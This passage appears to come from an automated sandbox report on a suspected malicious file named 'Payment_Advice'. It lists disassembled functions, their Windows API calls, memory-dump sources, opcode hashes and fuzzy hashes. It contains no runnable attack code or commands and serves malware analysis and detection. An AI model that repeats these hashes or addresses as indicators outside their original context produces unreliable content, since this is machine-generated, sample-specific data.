                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2244327787-0
                                                                                                    • Opcode ID: 8d03bb2972ab1c52779113a101fc71d4933626f0de4edd9e37e742c14ed8631e
                                                                                                    • Instruction ID: 2dd6552e469d9fce0b756f1e0faf9fb87e5274a980f0c4ebfb64ea4ea47e883e
                                                                                                    • Opcode Fuzzy Hash: 8d03bb2972ab1c52779113a101fc71d4933626f0de4edd9e37e742c14ed8631e
                                                                                                    • Instruction Fuzzy Hash: 8A11CE31910604EBCF209F24C808A6E3FA8FF92320F10CA29F456852DAD7749E44EB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,005240EF,00000000,00000000,?,0052ACDB,005240EF,00000000,00000000,00000000,?,0052AED8,00000006,FlsSetValue), ref: 0052AD66
                                                                                                    • GetLastError.KERNEL32(?,0052ACDB,005240EF,00000000,00000000,00000000,?,0052AED8,00000006,FlsSetValue,00537970,FlsSetValue,00000000,00000364,?,005298B7), ref: 0052AD72
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0052ACDB,005240EF,00000000,00000000,00000000,?,0052AED8,00000006,FlsSetValue,00537970,FlsSetValue,00000000), ref: 0052AD80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 44c556b7d9a3a69ff21af1ced9b0f46a7e8ebc39eb805fb586268938b0e73993
                                                                                                    • Instruction ID: f0a089dd57d75e07130b71a99f2dfe26fbf73e88ae3a3c325d337ba4f4980bf0
                                                                                                    • Opcode Fuzzy Hash: 44c556b7d9a3a69ff21af1ced9b0f46a7e8ebc39eb805fb586268938b0e73993
                                                                                                    • Instruction Fuzzy Hash: 1201F736601236AFC7314A68BC48A577F98FF167A37150A20FD07D76D0D720D80596E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 005297E5: GetLastError.KERNEL32(?,00541098,00524674,00541098,?,?,005240EF,?,?,00541098), ref: 005297E9
                                                                                                      • Part of subcall function 005297E5: _free.LIBCMT ref: 0052981C
                                                                                                      • Part of subcall function 005297E5: SetLastError.KERNEL32(00000000,?,00541098), ref: 0052985D
                                                                                                      • Part of subcall function 005297E5: _abort.LIBCMT ref: 00529863
                                                                                                      • Part of subcall function 0052BB4E: _abort.LIBCMT ref: 0052BB80
                                                                                                      • Part of subcall function 0052BB4E: _free.LIBCMT ref: 0052BBB4
                                                                                                      • Part of subcall function 0052B7BB: GetOEMCP.KERNEL32(00000000,?,?,0052BA44,?), ref: 0052B7E6
                                                                                                    • _free.LIBCMT ref: 0052BA9F
                                                                                                    • _free.LIBCMT ref: 0052BAD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                    • String ID: pS
                                                                                                    • API String ID: 2991157371-3706138410
                                                                                                    • Opcode ID: 18ec6816bd6d707a3f86ab9840b9ced1339fdb907eef79f7e756830d4357f353
                                                                                                    • Instruction ID: 3470878199fa8d49dc93315f44e85c33216dd4990e270486b84ea700763f9b82
                                                                                                    • Opcode Fuzzy Hash: 18ec6816bd6d707a3f86ab9840b9ced1339fdb907eef79f7e756830d4357f353
                                                                                                    • Instruction Fuzzy Hash: 3431DC3190422AAFEB10DFA8E545B6D7FF5FF82320F254099E5049B2E2EB315D44DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00511043
                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0051108A
                                                                                                      • Part of subcall function 00506C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00506C54
                                                                                                      • Part of subcall function 00506DCB: _wcschr.LIBVCRUNTIME ref: 00506E0A
                                                                                                      • Part of subcall function 00506DCB: _wcschr.LIBVCRUNTIME ref: 00506E19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                    • String ID: CreateThread failed
                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                    • Opcode ID: e7ecc5256806f34572f86e22fba7c0f1b4bed068cfa534488840166c0ca6065f
                                                                                                    • Instruction ID: 55151eee4ec78f69afba6a1439d0ff22c5ca0819f52b0057a8650d29f130c066
                                                                                                    • Opcode Fuzzy Hash: e7ecc5256806f34572f86e22fba7c0f1b4bed068cfa534488840166c0ca6065f
                                                                                                    • Instruction Fuzzy Hash: 7A01DB7534470A6BE3346E649C59BFA7B98FB54755F10002EF687562C0CAA16CC48628
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AE2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0050C29A: _wcslen.LIBCMT ref: 0050C2A2
                                                                                                      • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00511FE5
                                                                                                      • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00511FF6
                                                                                                      • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00512006
                                                                                                      • Part of subcall function 00511FDD: _wcslen.LIBCMT ref: 00512014
                                                                                                      • Part of subcall function 00511FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0050B371,?,?,00000000,?,?,?), ref: 0051202F
                                                                                                      • Part of subcall function 0051AC04: SetCurrentDirectoryW.KERNELBASE(?,0051AE72,C:\Users\user\Desktop,00000000,0054946A,00000006), ref: 0051AC08
                                                                                                    • _wcslen.LIBCMT ref: 0051AE8B
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,0054946A,00000006), ref: 0051AEC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                    • API String ID: 1016385243-1876063424
                                                                                                    • Opcode ID: e809e96f972877259873e97d4b36cad31aa3c50650a58a455c4ef0f6c011ca6d
                                                                                                    • Instruction ID: d72a60fce1f1aebfef16545711c9048276a22e6d929038c29ba5cf0960bdcc5e
                                                                                                    • Opcode Fuzzy Hash: e809e96f972877259873e97d4b36cad31aa3c50650a58a455c4ef0f6c011ca6d
                                                                                                    • Instruction Fuzzy Hash: AC015E71D0025A65EF11ABA4DD0FEDF7AFCBF49304F000855F605E3191E6B89A888BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0052BF30: GetEnvironmentStringsW.KERNEL32 ref: 0052BF39
                                                                                                      • Part of subcall function 0052BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0052BF5C
                                                                                                      • Part of subcall function 0052BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0052BF82
                                                                                                      • Part of subcall function 0052BF30: _free.LIBCMT ref: 0052BF95
                                                                                                      • Part of subcall function 0052BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0052BFA4
                                                                                                    • _free.LIBCMT ref: 005282AE
                                                                                                    • _free.LIBCMT ref: 005282B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                    • String ID: 0"V
                                                                                                    • API String ID: 400815659-4270886499
                                                                                                    • Opcode ID: 3b61820bcac1a81b2a39ebe205cbcc7a62c4ae3c7fd56dd961760861c8ac284c
                                                                                                    • Instruction ID: 2439f445824e121debe47690e4ed64e7ed3f84c968b69787b3aaa80eef66961f
                                                                                                    • Opcode Fuzzy Hash: 3b61820bcac1a81b2a39ebe205cbcc7a62c4ae3c7fd56dd961760861c8ac284c
                                                                                                    • Instruction Fuzzy Hash: 40E0ED2BA07D7381B26132BA3C5A63B0F407FD3338F650B16F9208B0D3CE50880604A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q$2Q
                                                                                                    • API String ID: 1269201914-2222477993
                                                                                                    • Opcode ID: 94ef2a993ca968d20879594b260607dc1c321ef17cc286987260f3a110e7f7ac
                                                                                                    • Instruction ID: 2e14ebd6528ae1b1c3203138273da0d29b9583e769c7527fc2dd575cd81343af
                                                                                                    • Opcode Fuzzy Hash: 94ef2a993ca968d20879594b260607dc1c321ef17cc286987260f3a110e7f7ac
                                                                                                    • Instruction Fuzzy Hash: A7B012D125D0017D3244520C1C0BD7F0E4DF4C1F20330442EFC04C1080F9400C860631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00509F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0050D343,00000001,?,?,?,00000000,0051551D,?,?,?), ref: 00509F9E
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0051551D,?,?,?,?,?,00514FC7,?), ref: 00509FE5
                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0050D343,00000001,?,?), ref: 0050A011
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$Handle
                                                                                                    • String ID:
                                                                                                    • API String ID: 4209713984-0
                                                                                                    • Opcode ID: cb0a63bc07fabc14a7bf8f1ae4688feab9b0276487da8da65ea7da7100a4ad0f
                                                                                                    • Instruction ID: 03cd581648e118d1b56308f5b4f41f44a70128559e500ae8440c8982f2723515
                                                                                                    • Opcode Fuzzy Hash: cb0a63bc07fabc14a7bf8f1ae4688feab9b0276487da8da65ea7da7100a4ad0f
                                                                                                    • Instruction Fuzzy Hash: 2631B37120830AAFDB15CF20D818BAE7BA5FF94715F04491DF941972D1C775AD48CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0050C27E: _wcslen.LIBCMT ref: 0050C284
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A2D9
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A30C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A329
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2260680371-0
                                                                                                    • Opcode ID: d11cfe45c10aceea4750a19f31281bf71324109da77ccc347e593dd70cd789e9
                                                                                                    • Instruction ID: a45e043f46cfa57c8545eae41788a624d5584947be6527bb4ce91f0ce06c72a4
                                                                                                    • Opcode Fuzzy Hash: d11cfe45c10aceea4750a19f31281bf71324109da77ccc347e593dd70cd789e9
                                                                                                    • Instruction Fuzzy Hash: 7801B1396003116AEF21AB758C4EBED3E88BF0A780F044864F901E61C1E764DA8186B6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0052B8B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                    • Opcode ID: 9bf781c690b1ad97f8e678e984abec05bf8352f8678a4e2a3f1d026cb62abcba
                                                                                                    • Instruction ID: bfcc73052d75d3e0bde1c470f419936684784cfc9992316e4507c63fe3ac6eee
                                                                                                    • Opcode Fuzzy Hash: 9bf781c690b1ad97f8e678e984abec05bf8352f8678a4e2a3f1d026cb62abcba
                                                                                                    • Instruction Fuzzy Hash: 2B41FB7150426C9AEF218E149C84BF6BFB9FF56304F1408EDE59986182D3359A85DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0052AFDD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                    • Opcode ID: 40655842e492336f6279070bad0940a7b77521a1bb0030fd0ef85bbe28bfc64b
                                                                                                    • Instruction ID: 6615d5f81c30979de1c92625e506dc0b26e30345e3a0db92992189ea9e6a0590
                                                                                                    • Opcode Fuzzy Hash: 40655842e492336f6279070bad0940a7b77521a1bb0030fd0ef85bbe28bfc64b
                                                                                                    • Instruction Fuzzy Hash: 5801137650421EBBCF129F90ED06DEE7FA2FF49750F014254FE14662A0CA368A31AB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0052A56F), ref: 0052AF55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                    • Opcode ID: 0632a9045d24742c6523ac53b682977375722a751ad1f706eeda6050db120d2b
                                                                                                    • Instruction ID: acd5e0436b5671c0c5c5160cef6384709e6964508942ea46d5102c6d0f6a4d8b
                                                                                                    • Opcode Fuzzy Hash: 0632a9045d24742c6523ac53b682977375722a751ad1f706eeda6050db120d2b
                                                                                                    • Instruction Fuzzy Hash: 59F02472A4921CBBCB115F10DC06DAE7F60FF08711F004154FD08963A0DA314E10A785
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: FlsAlloc
                                                                                                    • API String ID: 2773662609-671089009
                                                                                                    • Opcode ID: 9fe8667b727e160fbb3ab17a49ef89a438c26745854d0a7dc51b78be38919dbb
                                                                                                    • Instruction ID: c7f9bcfa99e79a24e9adde7369a1d708d827aaee279e068667dc58e9e53b00dc
                                                                                                    • Opcode Fuzzy Hash: 9fe8667b727e160fbb3ab17a49ef89a438c26745854d0a7dc51b78be38919dbb
                                                                                                    • Instruction Fuzzy Hash: 4DE0AB72A4422C7BC310AB64EC07E6EBF90FF59B21F010298FC00A3380CD705E1096D6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
